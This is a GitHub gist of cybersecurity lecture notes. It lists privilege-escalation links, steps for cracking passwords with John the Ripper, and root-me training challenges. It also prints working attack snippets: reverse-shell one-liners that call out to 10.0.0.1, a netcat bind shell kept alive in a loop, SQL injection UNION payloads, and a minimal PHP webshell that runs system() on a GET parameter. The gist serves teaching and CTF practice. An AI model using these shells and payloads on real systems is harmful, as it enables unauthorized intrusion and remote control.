Skip to content

Instantly share code, notes, and snippets.

@sbnsec

sbnsec/README.md

Last active December 18, 2023 08:56
Show Gist options
  • Save sbnsec/8e22d230a104eb253e59bab2aa564813 to your computer and use it in GitHub Desktop.
Save sbnsec/8e22d230a104eb253e59bab2aa564813 to your computer and use it in GitHub Desktop.
Download ZIP
Interesting links
Raw
README.md

Cybersecurity lecture notes

https://forms.gle/bvbE9S3JcroHhLZA8 This file list interesting link related to computer security (tools, info, tuto, interesting sites, ressources)

Interesting links

PrivESC

Windows Privilege Escalation CheatCheet

Linux Privilege Escalation Binary

LinEnum

Unix privesc

Linprivchecker

Monitor linux process

Reserve shell

Ngrok : Exspose ports to Internet

Plink ssh tunnels on windows

Steganography

Aperi'Solve performs layer analysis on image

Tools

CyberChef : Encode and decode data

Download KALI linux live 2020.4

how to crack a password

  1. Identify the type of hash
  1. Use john the ripper (already installed on kali)
  1. Use a custom wordlist on john the ripper

Reverse/bind shell

#Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");’
socat file:`tty`,raw,echo=0 TCP-L:port
Bind shell
nc –lvp 4444 –e /bin/bash

#Add a bit of persistence:
while true; do nc –lvp 4444 –e /bin/bash; done

SQL exemples Payloads

https://portswigger.net/web-security/sql-injection/cheat-sheet

user"; --
user" union select 1,2,3,4,@@version; --
user" union select 1,2,3,4,group_concat(schema_name) from information_schema.schemata; --

PHP the most simple webshell

<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }

//Pour aller plus loin : https://github.com/flozz/p0wny-shell
?>

Challenges

introduction aux challs et a burp - http://challenge01.root-me.org/web-serveur/ch5/
introduction aux challs et a burp - http://challenge01.root-me.org/web-serveur/ch7/
Injection SQL - http://challenge01.root-me.org/web-serveur/ch9/
Injection (SQL blind) - http://challenge01.root-me.org/web-serveur/ch10/
Injection (SQL blind) - http://challenge01.root-me.org/web-serveur/ch11/
Path traversal - http://challenge01.root-me.org/web-serveur/ch15/
XSS Injection - https://xss-game.appspot.com/level1

String to decode

427261766f207475206120726575737369206c65206368616c6c656e6765

aidhaSBwZXJkdQ==

26237834373b26237834373b26237832303b26237832313b26237832303b26237837343b26237837353b26237832303b26237836313b26237832303b26237837323b26237836353b26237837353b26237837333b26237837333b26237836393b

Wifi challenge

WEP - https://ufile.io/h28b15y2 WPA2 - https://ufile.io/3qfmvxzn

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment